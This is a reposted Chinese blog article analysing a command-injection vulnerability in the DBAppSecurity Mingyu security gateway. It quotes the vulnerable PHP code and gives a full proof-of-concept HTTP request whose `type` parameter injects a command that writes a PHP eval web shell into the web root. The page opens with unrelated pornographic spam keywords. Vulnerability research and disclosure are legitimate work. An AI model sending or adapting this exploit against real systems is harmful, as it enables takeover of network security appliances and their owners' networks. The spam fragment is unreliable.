国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

安恒信息-明御安全網(wǎng)關(guān) 命令執(zhí)行漏洞分析

這篇具有很好參考價值的文章主要介紹了安恒信息-明御安全網(wǎng)關(guān) 命令執(zhí)行漏洞分析。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

目錄

注意

漏洞描述

漏洞位置

漏洞代碼

POC:


注意

由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,文章作者不為此承擔任何責任。

漏洞描述

安恒信息-明御安全網(wǎng)關(guān)存在命令執(zhí)行漏洞,導(dǎo)致攻擊者可以直接執(zhí)行系統(tǒng)命令,從而控制目標系統(tǒng)。

漏洞位置

/usr/local/webui/webui/modules/aaa/portal_auth.mds

漏洞代碼

$portal_catalog = "/usr/local/webui/auth/portal";
...
//重置
if($get_url_param == "aaa_portal_auth_config_reset"){
	$type = $_GET['type'];
	$logo_type = $type.'_logo_pic';
	$bkg_type = $type.'_bkg_pic';

	$config = file_get_contents($portal_catalog."/config.txt");
	$config_arr = json_decode($config,true);

	$config_dft = file_get_contents($portal_catalog."/default_config.txt");
	$config_dft_arr = json_decode($config_dft,true);
	
	if($type == 'adv'){
		$config_arr[diff] = $config_dft_arr[diff];
	}
	$config_arr[$type] = $config_dft_arr[$type];

	//刪除圖片
	exec('rm '.$portal_catalog.'/'.$type.'/images/'.$type.'*');

	$new_config = json_encode($config_arr);
	file_put_contents($portal_catalog."/config.txt",$new_config);
	backupAuthFile($type);
	echo '{"reset":"'.$type.'"}';
}

分析上述代碼如果 $get_url_param 等于?"aaa_portal_auth_config_reset",即可執(zhí)行下面代碼。

其中$get_url_param 通過$_GET['g']來獲得。漏洞發(fā)生位置在exec('rm '.$portal_catalog.'/'.$type.' /images/'.$type.'*');其中$type通過?$_GET['type']來獲得。從而可以截斷代碼,從而執(zhí)行自己的命令。文章來源地址http://www.zghlxwxcb.cn/news/detail-524915.html

POC:

GET /webui/?g=aaa_portal_auth_config_reset&type=1%3Becho%20'%3C%3Fphp%20%40eval(%24_POST%5B'cmd'%5D)%3Bulink(FILE)%3B%3F%3E'%20%3E%2Fusr%2Flocal%2Fwebui%2Ftest1.php%3B HTTP/1.1
Host: 
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer:
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

到了這里,關(guān)于安恒信息-明御安全網(wǎng)關(guān) 命令執(zhí)行漏洞分析的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 漏洞深度分析|CVE-2022-1471 SnakeYaml 命令執(zhí)行漏洞

    漏洞深度分析|CVE-2022-1471 SnakeYaml 命令執(zhí)行漏洞

    YAML是一種數(shù)據(jù)序列化格式,設(shè)計用于人類的可讀性和與腳本語言的交互。 SnakeYaml是一個完整的YAML1.1規(guī)范Processor,支持UTF-8/UTF-16,支持Java對象的序列化/反序列化,支持所有YAML定義的類型。 https://github.com/snakeyaml/snakeyaml SnakeYaml通常使用方法如下: new Yaml(new Constructor(TestDataC

    2023年04月27日
    瀏覽(27)
  • CVE-2021-40444分析報告微軟MHTML遠程命令執(zhí)行漏洞

    2021 年 8 月 21 日,MSTIC 觀察到一名 Mandiant 員工在社交媒體上發(fā)布的帖子,該員工具有跟蹤 Cobalt Strike Beacon 基礎(chǔ)設(shè)施的經(jīng)驗。所寫文章重點介紹了一個于 2021 年 8 月 19 日上傳到 VirusTotal的 Microsoft Word 文檔(SHA-256:3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf)。 MSTIC 對樣

    2024年02月08日
    瀏覽(30)
  • 【漏洞復(fù)現(xiàn)】廈門才茂通信網(wǎng)關(guān)formping遠程命令執(zhí)行漏洞

    【漏洞復(fù)現(xiàn)】廈門才茂通信網(wǎng)關(guān)formping遠程命令執(zhí)行漏洞

    廈門才茂通信網(wǎng)關(guān)formping存在遠程命令執(zhí)行漏洞,攻擊者可通過特定payload對目標服務(wù)器發(fā)起攻擊,造成不可估量的影響。 請勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負責,所

    2024年02月15日
    瀏覽(44)
  • 【漏洞復(fù)現(xiàn)】銳捷EG易網(wǎng)關(guān)cli.php后臺命令執(zhí)行漏洞

    【漏洞復(fù)現(xiàn)】銳捷EG易網(wǎng)關(guān)cli.php后臺命令執(zhí)行漏洞

    ? ? ? ? 銳捷EG易網(wǎng)關(guān)是一款綜合網(wǎng)關(guān),由銳捷網(wǎng)絡(luò)完全自主研發(fā)。它集成了先進的軟硬件體系架構(gòu),配備了DPI深入分析引擎、行為分析/管理引擎,可以在保證網(wǎng)絡(luò)出口高效轉(zhuǎn)發(fā)的條件下,提供專業(yè)的流控功能、出色的URL過濾以及本地化的日志存儲/審計服務(wù)。 ????????銳

    2024年01月22日
    瀏覽(23)
  • Apache Apisix網(wǎng)關(guān)系統(tǒng)歷史漏洞復(fù)現(xiàn)分析

    Apache Apisix網(wǎng)關(guān)系統(tǒng)歷史漏洞復(fù)現(xiàn)分析

    Apache APISIX 是一個動態(tài)、實時、高性能的 API 網(wǎng)關(guān), 提供負載均衡、動態(tài)上游、灰度發(fā)布、服務(wù)熔斷、身份認證、可觀測性等豐富的流量管理功能。 開源項目地址:https://github.com/apache/apisix; 官方文檔地址:https://apisix.apache.org/zh/docs/apisix/getting-started/README/; 你可以把 Apache

    2024年02月19日
    瀏覽(23)
  • RCE 遠程代碼執(zhí)行漏洞分析

    RCE 遠程代碼執(zhí)行漏洞分析

    Remote Command/Code Execute 遠程命令執(zhí)行/遠程代碼執(zhí)行漏洞 這種漏洞通常出現(xiàn)在應(yīng)用程序或操作系統(tǒng)中,攻擊者可以通過利用漏洞注入惡意代碼,并在受攻擊的系統(tǒng)上執(zhí)行任意命令。 PHP 代碼執(zhí)行 PHP 代碼注入 OS 命令執(zhí)行 OS 命令注入 Java、Python…… Web 應(yīng)用程序 遠程服務(wù) 操作系統(tǒng)

    2024年02月08日
    瀏覽(30)
  • Apache ActiveMQ 遠程代碼執(zhí)行漏洞分析

    Apache ActiveMQ官方發(fā)布新版本,修復(fù)了一個遠程代碼執(zhí)行漏洞(CNVD-2023-69477? CVE-2023-46604),攻擊者可構(gòu)造惡意請求通過Apache ActiveMQ的61616端口發(fā)送惡意數(shù)據(jù)導(dǎo)致遠程代碼執(zhí)行,從而完全控制Apache ActiveMQ服務(wù)器。 影響版本 ? 環(huán)境搭建 沒有找到合適的 docker 鏡像 ,嘗試自己進行

    2024年02月03日
    瀏覽(18)
  • Winrar代碼執(zhí)行漏洞(CVE-2023-38831)的原理分析

    Winrar代碼執(zhí)行漏洞(CVE-2023-38831)的原理分析

    背景 在2023年8月23日,Group-IB威脅情報機構(gòu)發(fā)布了一份報告,詳細介紹了WinRAR任意執(zhí)行漏洞CVE-2023-38831的攻擊活動。根據(jù)該報告,這個漏洞最早于2023年4月被攻擊者利用,然后在2023年7月被Group-IB威脅情報機構(gòu)發(fā)現(xiàn)并報告給了RARLAB。最終,RARLAB在2023年8月2日發(fā)布了修復(fù)了CVE-2023-

    2024年02月08日
    瀏覽(20)
  • CVE-2021-22204 GitLab RCE之exiftool代碼執(zhí)行漏洞深入分析(二)

    文章寫于2022-01-19,首發(fā)在天融信阿爾法實驗室 1 前言 2 前置知識 2.1 JPEG文件格式 2.2 Perl模式匹配 3 exiftool源碼調(diào)試到漏洞分析 3.1 環(huán)境搭建 3.2 漏洞簡介 3.3 exiftool是如何解析嵌入的0xc51b標簽 3.4 exiftool是如何調(diào)用parseAnt函數(shù) 3.5 parseAnt函數(shù)分析 3.6 parseAnt漏洞分析 4 漏洞利用 4.1

    2024年02月14日
    瀏覽(19)
  • 【網(wǎng)絡(luò)安全】命令執(zhí)行漏洞

    【網(wǎng)絡(luò)安全】命令執(zhí)行漏洞

    應(yīng)用程序中有時候需要調(diào)用一些執(zhí)行系統(tǒng)命令的函數(shù),在php中常見的為 system 、 exec 、 shell_exec 、 passthru 、 proc_poen 、 popen 等函數(shù)用來執(zhí)行系統(tǒng)命令。當黑客能控制這些函數(shù)的參數(shù)時,就可以講惡意的系統(tǒng)命令拼接到正常的命令中,就會命令執(zhí)行攻擊,這就是命令執(zhí)行漏洞。

    2024年02月03日
    瀏覽(31)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包